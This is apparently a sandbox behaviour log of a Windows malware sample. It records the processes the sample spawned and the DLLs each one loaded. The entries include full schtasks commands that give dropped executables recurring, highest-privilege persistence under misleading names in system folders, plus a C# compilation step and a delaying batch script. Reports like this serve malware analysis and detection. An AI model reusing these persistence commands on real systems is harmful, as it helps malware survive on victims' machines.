Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ikEtBZXIKU1m0Gni" /sc MINUTE /mo 10 /tr "'C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 10 /tr "'C:\Windows\IME\en-GB\Registry.exe'" /f
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Windows\IME\en-GB\Registry.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe C:\Recovery\iHstGpVMr4QFhc62UUbis.exe
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 8 /tr "'C:\Windows\IME\en-GB\Registry.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe C:\Recovery\iHstGpVMr4QFhc62UUbis.exe
Source: unknown	Process created: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe
Source: unknown	Process created: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe
Source: unknown	Process created: C:\Recovery\upfc.exe C:\Recovery\upfc.exe
Source: unknown	Process created: C:\Recovery\upfc.exe C:\Recovery\upfc.exe
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ftydHX0xsT.bat"
Source: unknown	Process created: C:\Windows\bcastdvr\uwTuxQS3V.exe C:\Windows\bcastdvr\uwTuxQS3V.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\bcastdvr\uwTuxQS3V.exe C:\Windows\bcastdvr\uwTuxQS3V.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: unknown	Process created: C:\Windows\IME\en-GB\Registry.exe C:\Windows\IME\en-GB\Registry.exe
Source: unknown	Process created: C:\Windows\IME\en-GB\Registry.exe C:\Windows\IME\en-GB\Registry.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe "C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe"
Source: unknown	Process created: C:\Recovery\upfc.exe "C:\Recovery\upfc.exe"
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ecdbob4x\ecdbob4x.cmdline"	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ftydHX0xsT.bat"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE7C8.tmp" "c:\Windows\System32\CSC3F2531052F24CCCAD119855F7C96013.TMP"	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe "C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe"

Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Section loaded: mscoree.dll
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Section loaded: apphelp.dll
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Section loaded: version.dll
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Section loaded: wldp.dll
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Section loaded: profapi.dll
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Section loaded: sspicli.dll
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Section loaded: mscoree.dll
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Section loaded: version.dll
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Section loaded: wldp.dll
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Section loaded: profapi.dll
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Section loaded: sspicli.dll
Source: C:\Recovery\upfc.exe	Section loaded: mscoree.dll
Source: C:\Recovery\upfc.exe	Section loaded: apphelp.dll
Source: C:\Recovery\upfc.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\upfc.exe	Section loaded: version.dll
Source: C:\Recovery\upfc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\upfc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\upfc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\upfc.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\upfc.exe	Section loaded: wldp.dll
Source: C:\Recovery\upfc.exe	Section loaded: profapi.dll
Source: C:\Recovery\upfc.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\upfc.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\upfc.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\upfc.exe	Section loaded: sspicli.dll
Source: C:\Recovery\upfc.exe	Section loaded: mscoree.dll
Source: C:\Recovery\upfc.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\upfc.exe	Section loaded: version.dll
Source: C:\Recovery\upfc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\upfc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\upfc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\upfc.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\upfc.exe	Section loaded: wldp.dll
Source: C:\Recovery\upfc.exe	Section loaded: profapi.dll
Source: C:\Recovery\upfc.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\upfc.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\upfc.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\upfc.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Section loaded: mscoree.dll
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Section loaded: apphelp.dll
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Section loaded: version.dll
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Section loaded: windows.storage.dll
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Section loaded: wldp.dll
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Section loaded: profapi.dll
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Section loaded: cryptsp.dll
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Section loaded: rsaenh.dll
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Section loaded: cryptbase.dll
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Section loaded: sspicli.dll
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Section loaded: mscoree.dll
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Section loaded: version.dll
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Section loaded: windows.storage.dll
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Section loaded: wldp.dll
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Section loaded: profapi.dll
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Section loaded: cryptsp.dll
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Section loaded: rsaenh.dll
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Section loaded: cryptbase.dll
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\IME\en-GB\Registry.exe	Section loaded: mscoree.dll
Source: C:\Windows\IME\en-GB\Registry.exe	Section loaded: apphelp.dll
